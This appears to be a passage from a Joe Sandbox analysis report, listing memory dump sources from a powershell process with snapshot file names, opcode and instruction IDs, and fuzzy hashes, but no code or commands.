                                                      • Instruction ID: 3100a050dc42afa15d70bfb51080bdce2d4062ad869ea6a207d9a0fe9d9a217d
                                                      • Opcode Fuzzy Hash: 1fc19126c176037180c3fa50f59ffc455ab81192e91ab82831a11d622a15a08c
                                                      • Instruction Fuzzy Hash: 234159B5B00241DBCB359A7998116EEBBA1DFD3714B10846AD5439F341DE31DC86C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65020165623.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_76b0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 04da222dda93fdc5ee5e6078d5053f7a017bf9a0e570159e2aea38765f628858
                                                      • Instruction ID: 98e4a7966f5090c01b6cfb31de7721b230c26d2734ae08a08e664e7c46eccf4b
                                                      • Opcode Fuzzy Hash: 04da222dda93fdc5ee5e6078d5053f7a017bf9a0e570159e2aea38765f628858
                                                      • Instruction Fuzzy Hash: DA418BB5B012409BCB3597B894106EEBB919FC3310B14846AD643CF782DE319C92C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.65012973950.0000000006BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_6ba0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f195efc27dcb976de4a4da92111afd2a3da1ce80722b90d5db11c698de6478c8
                                                      • Instruction ID: d9d71bf57dfa5af153519704a18d6d158da5da0ee8f8e018735fb2f54f0ce991
                                                      • Opcode Fuzzy Hash: f195efc27dcb976de4a4da92111afd2a3da1ce80722b90d5db11c698de6478c8
                                                      • Instruction Fuzzy Hash: D6415AB0A046099FCB05CF59C1949AAFBB1FF48310B25819AD845AB365D736FDA1CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.64977320392.00000000046AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_46ad000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed2e0a7c5a87977ce0c96493ff6db66363af4c38eec5a28002d61863cc7c83ba
                                                      • Instruction ID: 3e63e219e210ed8ae9fcd3bc4b25c1a753934835e314b2382a61288f7dcd46bf
                                                      • Opcode Fuzzy Hash: ed2e0a7c5a87977ce0c96493ff6db66363af4c38eec5a28002d61863cc7c83ba
                                                      • Instruction Fuzzy Hash: 8E01806240D7C05FE7124F259C84752BFA8DF53220F1980DBE9848F697D2685C45CB71
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.64977320392.00000000046AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046AD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_46ad000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36b37b5bfed379de9121dbbb96a57a2f035a23040bca47e2a967509b3a5d8c21
                                                      • Instruction ID: 7b7bb1391fa1e81a6b8fa1eebbd3ed71144e0cdfd3a5fabdfa6cd66c0caaf80c
                                                      • Opcode Fuzzy Hash: 36b37b5bfed379de9121dbbb96a57a2f035a23040bca47e2a967509b3a5d8c21
                                                      • Instruction Fuzzy Hash: CD01F771505B40AAE7104F29E8C4B67FF98DF51324F18C01AEC480B686E279AC86CAB1